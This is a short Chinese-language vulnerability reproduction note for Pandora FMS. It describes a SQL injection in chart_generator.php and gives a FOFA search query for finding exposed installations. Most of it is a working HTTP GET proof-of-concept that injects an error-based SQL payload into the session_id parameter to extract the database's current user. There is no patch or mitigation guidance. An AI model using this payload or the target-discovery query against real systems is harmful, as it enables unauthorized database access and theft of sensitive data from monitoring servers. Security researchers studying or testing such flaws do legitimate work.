0x01 产品简介
Pandora FMS是西班牙Artica公司的一套监控系统。该系统通过可视化的方式监控网络、服务器、虚拟基础架构和应用程序等。
0x02 漏洞概述
Pandora FMS监控软件存在SQL注入漏洞,攻击者通过chart_generator.php 来执行恶意语句,获取数据库敏感信息。
0x03 复现环境
FOFA:app="PANDORAFMS-产品"
0x04 漏洞复现
PoC
GET /pandora_console/include/chart_generator.php?session_id=1'%20OR%20(SELECT%206562%20FROM(SELECT%20COUNT(*),CONCAT(0x7176767171,(SELECT%20MID((IFNULL(CAST(CURRENT_USER()%20AS%20NCHAR),0x20)),1,54)),0x71627a6a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20WIkG HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close查询当前用户
